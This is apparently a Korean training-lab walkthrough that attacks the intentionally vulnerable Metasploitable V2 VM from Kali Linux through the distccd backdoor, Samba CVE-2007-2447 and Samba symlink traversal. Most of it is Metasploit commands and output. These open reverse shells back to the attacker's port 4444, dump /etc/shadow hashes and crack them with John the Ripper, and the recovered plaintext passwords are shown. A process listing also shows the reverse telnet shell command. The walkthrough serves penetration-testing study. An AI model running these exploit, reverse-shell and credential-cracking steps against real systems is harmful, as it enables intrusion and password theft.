Metasploitable V2 Linux 서버의 취약점(distccd,samba)

(5) 버그를 공격하는 경우(Backdoor 존재하는 취약점)

 

■ 실습 시스템

- KaliLinux (EX: attacker system)

- Metasploitable V2 Linux (EX: victim system)

 

■ 공격의 개요

 

Security weakness to execute arbitrary commands on any system running distccd.

distccd - 다중 컴파일 프로그램

 

■ 취약점 공격 과정(distccd Backdoor 존재하는 취약점)

(KaliLinux)

① distccd 데몬 확인

# nmap -p 3632 192.168.10.134

Starting Nmap 7.01 ( https://nmap.org ) at 2016-04-01 19:20 KST

Nmap scan report for 192.168.10.134

Host is up (0.00030s latency).

PORT STATE SERVICE

3632/tcp open distccd

MAC Address: 00:0C:29:FA:DD:2A (VMware)

 

Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds

 

 

# msfconsole -q

msf > search distcc   Matching Modules ================   Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution     msf > use exploit/unix/misc/distcc_exec msf exploit(distcc_exec) > show options   Module options (exploit/unix/misc/distcc_exec):   Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 3632 yes The target port     Exploit target:   Id Name -- ---- 0 Automatic Target   msf exploit(distcc_exec) > set RHOST 192.168.10.134 RHOST => 192.168.10.134 msf exploit(distcc_exec) > run   [*] Started reverse TCP double handler on 192.168.10.50:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo pX7hrrhiIh6Lt5w2; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "pX7hrrhiIh6Lt5w2\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.10.50:4444 -> 192.168.10.134:60579) at 2016-04-01 19:24:46 +0900   id uid=1(daemon) gid=1(daemon) groups=1(daemon) pwd /tmp hostname metasploitable ifconfig eth0 ..... (중략) .....

 

 

 

 

 

(6) 버그를 공격하는 경우(samba 취약점 존재)

 

■ 실습 시스템

- KaliLinux (EX: attacker system)

- Metasploitable V2 Linux (EX: victim system)

 

■ 공격의 개요

 

Exploit CVE 2007-2447

 

The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute

arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the

"username map script" smb.conf option is enabled, and allows remote authenticated users to execute

commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and

(3) file share management.

 

The root cause is passing unfiltered user input provided via MS-RPC calls to /bin/sh when invoking

externals scripts defined in smb.conf.

 

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447

http://www.samba.org/samba/security/CVE-2007-2447.html

 

 

■ 취약점 공격 과정(samba 취약점 존재)

(KaliLinux)

① samba 서비스 확인

# nmap -sV 192.168.10.134

53/tcp open domain ISC BIND 9.4.2

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)

111/tcp open rpcbind 2 (RPC #100000)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

512/tcp open exec netkit-rsh rexecd

513/tcp open login?

 

 

# msfconsole -q

msf> search samba

msf> use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > set rhost 192.168.10.134

msf exploit(usermap_script) > show payloads

msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse

msf exploit(usermap_script) > set lhost 192.168.10.134

msf exploit(usermap_script) > run

 

 

 

 

 

 

(Metasploitable V2 Linux)

③ Metasploitable V2 Linux 서버에서 분석 작업

$ id

uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)

 

$ sudo su -

[sudo] password for msfadmin: (msfadmin)

 

■ metasploit session 확인

# alias grep='grep --color'

# netstat -anp | head -2 ; netstat -anp | grep :4444

Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 192.168.10.134:58284 192.168.10.50:4444 ESTABLISHED 5721/telnet tcp 0 0 192.168.10.134:58283 192.168.10.50:4444 ESTABLISHED 5718/telnet

 

■ Reverse Telnet 확인

# ps -ef | grep 5721 | grep -v grep

UID PID PPID C STIME TTY TIME CMD root 5721 1 0 07:05 ? 00:00:00 telnet 192.168.10.50 4444

 

# ps -ef | grep 5718 | grep -v grep

UID PID PPID C STIME TTY TIME CMD root 5718 1 0 07:05 ? 00:00:00 telnet 192.168.10.50 4444

 

■ Metasploit 서버에 붙어 있는 /bin/sh 세션 확인

# ps -ef | grep 4444 | grep -v grep

UID PID PPID C STIME TTY TIME CMD root 5718 1 0 07:05 ? 00:00:00 telnet 192.168.10.50 4444 root 5719 1 0 07:05 ? 00:00:00 sh -c (sleep 4063|telnet 192.168.10.50 4444|while : ; do sh && break; done 2>&1|telnet 192.168.10.50 4444 >/dev/null 2>&1 &) root 5721 1 0 07:05 ? 00:00:00 telnet 192.168.10.50 4444

 

사용한 "cmd/unix/reverse" : "Unix Command Shell, Double Reverse TCP (telnet)"는

telnet 세션(sessions)을 2개 이루는 프로그램으로 판단이 된다.

 

(KaliLinux)

④ 분석 작업이 완료 되었다면 msfconsole 세션 종료

..... (중략) ..... ^C Abort session 1? [y/N] y   [*] 192.168.10.134 - Command shell session 1 closed. Reason: User exit msf exploit(usermap_script) > exit

 

⑤ /etc/shadow 파일의 Hash dump 작업

# msfconsole -q

msf > use exploit/multi/samba/usermap_script msf exploit(usermap_script) > set RHOST 192.168.10.134 RHOST => 192.168.10.134 msf exploit(usermap_script) > exploit   [*] Started reverse TCP double handler on 192.168.10.50:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo OcPfxno0Q9dF46uW; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "OcPfxno0Q9dF46uW\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.10.50:4444 -> 192.168.10.134:55317) at 2016-04-05 14:15:13 +0900   ^Z       대기상태 로 빠져 나간다. Background session 1? [y/N] y msf exploit(usermap_script) > sessions -l   Active sessions ===============   Id Type Information Connection -- ---- ----------- ---------- 1 shell unix 192.168.10.50:4444 -> 192.168.10.134:55317 (192.168.10.134)   msf exploit(usermap_script) > use post/linux/gather/hashdump msf post(hashdump) > show options   Module options (post/linux/gather/hashdump):   Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on.   msf post(hashdump) > set SESSION 1 SESSION => 1 msf post(hashdump) > exploit   [+] root:$1$CmDHSTw9$Ei9EjfjLrTkGgX7atpnlW0:0:0:root:/root:/bin/bash [+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh [+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false [+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash [+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash [+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash [+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash [+] user1:$1$N6t1HJDU$fN1iwuakspABsXj..4lmf/:1003:1003::/home/user1:/bin/bash [+] Unshadowed Password File: /root/.msf5/loot/20160405141842_default_192.168.10.134_linux.hashes_958442.txt [*] Post module execution completed msf post(hashdump) > exit [*] You have active sessions open, to exit anyway type "exit -y" msf post(hashdump) > exit -y

 

# john /root/.msf5/loot/20160405141842_default_192.168.10.134_linux.hashes_958442.txt

Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5" Use the "--format=aix-smd5" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 8 password hashes with 8 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 XOP 4x2]) Remaining 7 password hashes with 7 different salts Press 'q' or Ctrl-C to abort, almost any other key for status postgres (postgres) user (user) msfadmin (msfadmin) user1 (user1) service (service) 123456789 (klog) batman (sys) 7g 0:00:00:00 DONE 2/3 (2016-04-05 14:22) 21.87g/s 18800p/s 18884c/s 18884C/s asdfgh..fishing Use the "--show" option to display all of the cracked passwords reliably Session completed

 

# john --show /root/.msf5/loot/20160405141842_default_192.168.10.134_linux.hashes_958442.txt

root:soldesk1.:0:0:root:/root:/bin/bash sys:batman:3:3:sys:/dev:/bin/sh klog:123456789:103:104::/home/klog:/bin/false msfadmin:msfadmin:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash postgres:postgres:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash user:user:1001:1001:just a user,111,,:/home/user:/bin/bash service:service:1002:1002:,,,:/home/service:/bin/bash user1:user1:1003:1003::/home/user1:/bin/bash   8 password hashes cracked, 0 left

 

# cd /root/.msf5/loot

# ls -l

합계 12 -rw-r--r-- 1 root root 1361 4월 5 14:18 20160405141841_default_192.168.10.134_linux.shadow_027812.txt -rw-r--r-- 1 root root 649 4월 5 14:18 20160405141842_default_192.168.10.134_linux.hashes_958442.txt -rw-r--r-- 1 root root 1749 4월 5 14:18 20160405141842_default_192.168.10.134_linux.passwd_741349.txt

 

다음 파일들의 내용을 확인한다.

# cat 20160405141842_default_192.168.10.134_linux.passwd_741349.txt

# cat 20160405141841_default_192.168.10.134_linux.shadow_027812.txt

# cat 20160405141842_default_192.168.10.134_linux.hashes_958442.txt

 

unshadow 작업 된 파일

 

 

 

■ 삼바 서버의 다른 취약점을 공격하는 방법에 대해서도 확인해 보자.

 

Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.

 

(KaliLinux)

# smbclient -L //192.168.10.134

 

# msfconsole -q

msf > search samba_symlink   Matching Modules ================   Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal   msf > use auxiliary/admin/smb/samba_symlink_traversal msf auxiliary(samba_symlink_traversal) > show options   Module options (auxiliary/admin/smb/samba_symlink_traversal):   Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The SMB service port SMBSHARE yes The name of a writeable share on the server SMBTARGET rootfs yes The name of the directory that should point to the root filesystem   msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.10.134 RHOST => 192.168.10.134 msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp SMBSHARE => tmp msf auxiliary(samba_symlink_traversal) > exploit [*] 192.168.10.134:445 - Connecting to the server... [*] 192.168.10.134:445 - Trying to mount writeable share 'tmp'... [*] 192.168.10.134:445 - Trying to link 'rootfs' to the root filesystem... [*] 192.168.10.134:445 - Now access the following share to browse the root filesystem: [*] 192.168.10.134:445 - \\192.168.10.134\tmp\rootfs\   [*] Auxiliary module execution completed msf auxiliary(samba_symlink_traversal) > exit

 

# smbclient //192.168.10.134/tmp

ARNING: The "syslog" option is deprecated Enter root's password: Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

 

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1710 as /tmp/smbmore.BlS2T6 (1669.8 KiloBytes/sec) (average 1669.9 KiloBytes/sec) root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh ..... (중략) .....

 

하위 폴더까지 전부 공유 되어 있다.